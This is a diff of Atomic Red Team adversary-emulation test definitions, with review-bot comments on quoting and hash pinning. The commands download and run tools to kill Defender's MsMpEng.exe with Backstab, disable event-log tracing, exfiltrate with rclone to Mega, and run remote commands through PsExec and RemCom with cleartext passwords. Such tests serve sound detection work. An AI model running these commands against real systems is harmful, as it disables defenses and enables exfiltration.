@@ -633,11 +636,13 @@ atomic_tests: default: MsMpEng.exe dependency_executor_name: powershell dependencies: - - description: Backstab64.exe should exist in %temp% - prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1} - get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic + - description: Backstab64.exe should exist in ExtrnalPayloads Directory + prereq_command: if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" executor: - command: '& $env:temp\Backstab64.exe -k -n #{process_name}' + command: '& PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe -k -n #{process_name}' name: powershell elevation_required: true - name: WinPwn - Kill the event log services for stealth diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml index 181016f1..37caa310 100644 --- a/atomics/T1562.006/T1562.006.yaml +++ b/atomics/T1562.006/T1562.006.yaml @@ -88,7 +88,7 @@ atomic_tests: ps_exec_location: description: Location of PSExec. type: string - default: $env:temp\pstools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe session: description: The session to disable. type: string 
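Review bot: `& PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe -k -n #{process_name}` hands the call operator an unquoted path, unlike the quoted form used in the T1548.002 hunk of this same PR; if the substituted atomics path contains a space the command breaks, so write `& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n #{process_name}`. The dependency description also misspells the directory (`ExtrnalPayloads`). Backstab is pinned to a release tag but not to a hash; since it is run elevated to kill a protected process, a pinned SHA256 via `Invoke-WebRequestVerifyHash` would be consistent with T1560.001.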
@@ -102,8 +102,9 @@ atomic_tests: - description: PSExec must be installed on the machine. prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} get_prereq_command: |- - start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip" - expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" + expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force executor: command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets diff --git a/atomics/T1564.006/T1564.006.yaml b/atomics/T1564.006/T1564.006.yaml index 137b07f8..4073c891 100644 --- a/atomics/T1564.006/T1564.006.yaml +++ b/atomics/T1564.006/T1564.006.yaml 
@@ -90,17 +90,18 @@ atomic_tests: prereq_command: | if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null $wc = New-Object System.Net.WebClient - $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}") - start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait + $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}") + start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait - description: | VBoxManage must exist on disk at specified locations (#{vboxmanage_exe}) prereq_command: | if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1} get_prereq_command: | $wc = New-Object System.Net.WebClient - $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}") - start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait + $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}") + start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait executor: name: command_prompt elevation_required: false diff --git a/atomics/T1567.002/T1567.002.yaml b/atomics/T1567.002/T1567.002.yaml index fc34da89..5427a371 100644 --- a/atomics/T1567.002/T1567.002.yaml +++ b/atomics/T1567.002/T1567.002.yaml @@ -12,7 +12,7 @@ atomic_tests: rclone_path: description: Directory of rclone.exe type: path - default: $env:temp\T1567.002\rclone-v*\ + default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002\rclone-v*\ rclone_config_path: description: Path to rclone's config file (default should be fine) type: path 
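Review bot: Only the first get_prereq_command in this hunk gained the `New-Item -Type Directory` line; the second (VBoxManage) still downloads straight into ExternalPayloads, and because it runs only when `#{vboxmanage_exe}` is missing while `#{virtualbox_exe}` was found, the directory may not exist yet and `$wc.DownloadFile` throws. Add the same `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` before its `$wc = New-Object System.Net.WebClient`. Both branches also run an unverified installer with `--silent`, so the fixed `#{virtualbox_download}` URL is a good candidate for a pinned hash.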
@@ -20,7 +20,7 @@ atomic_tests: dir_to_copy: description: Directory to copy type: string - default: $env:temp\T1567.002 + default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002 mega_user_account: description: Mega user account type: string @@ -40,8 +40,9 @@ atomic_tests: prereq_command: | if (Test-Path #{rclone_path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip - Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile PathToAtomicsFolder\..\ExternalPayloads\rclone.zip + Expand-archive -path PathToAtomicsFolder\..\ExternalPayloads\rclone.zip -destinationpath PathToAtomicsFolder\..\ExternalPayloads\T1567.002\ -force executor: command: | New-Item #{rclone_config_path}\rclone -ItemType directory @@ -56,7 +57,7 @@ atomic_tests: .\rclone.exe config delete #{remote_share}: Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue cd c:\ - Remove-Item $env:temp\rclone.zip - Remove-Item $env:temp\T1567.002 -recurse -force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\rclone.zip + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\T1567.002 -recurse -force name: powershell elevation_required: false diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index d0d0a5aa..170e79d6 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml 
@@ -52,24 +52,20 @@ atomic_tests: description: Password type: string default: P@ssw0rd1 - psexec_exe: - description: Path to PsExec - type: string - default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | - PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + PsExec tool from Sysinternals must exist in the ExternalPayloads directory prereq_command: | - if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: command: | - #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" + PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" name: command_prompt - name: psexec.py (Impacket) auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35 
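Review bot: The command_prompt executor now runs `PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe \\#{remote_host} ...` unquoted; cmd.exe splits that on spaces, so it fails whenever the substituted atomics path contains one, whereas the RemCom hunk below in the same file quotes its executable. Make the line `"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"`. Removing the `psexec_exe` input presumably means any `-InputArgs` earlier callers passed for it is now ignored without warning, which deserves a note in the description. As with the other Sysinternals fetches in this PR, PsTools.zip is downloaded and executed without a hash check.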
@@ -160,21 +156,18 @@ atomic_tests: description: Password type: string default: P@ssw0rd1 - remcom_exe: - description: Path to RemCom - type: string - default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe dependency_executor_name: powershell dependencies: - description: | - RemCom tool must exist on disk at specified location (#{remcom_exe}) + RemCom tool must exist on disk in the ExternalPayloads folder prereq_command: | - if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" executor: command: | - "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe + "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe name: command_prompt - name: Snake Malware Service Create auto_generated_guid: b8db787e-dbea-493c-96cb-9272296ddc49
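Review bot: RemCom is fetched from `raw/master` on GitHub, so the binary the test runs against `\\#{remote_host}` with a cleartext `/pwd:` can change under the test at any time, while the Rubeus dependency in the T1548.002 hunk of this same PR pins its URL to a commit SHA. Pin this one the same way, e.g. `https://github.com/kavika13/RemCom/raw/<commit>/bin/Release/RemCom.exe`, and ideally add a hash check via `Invoke-WebRequestVerifyHash`. Dropping the `remcom_exe` input also removes the repo-relative `T1569.002\bin\remcom.exe` default, so the test now always needs network access for the prereq; worth stating in the description.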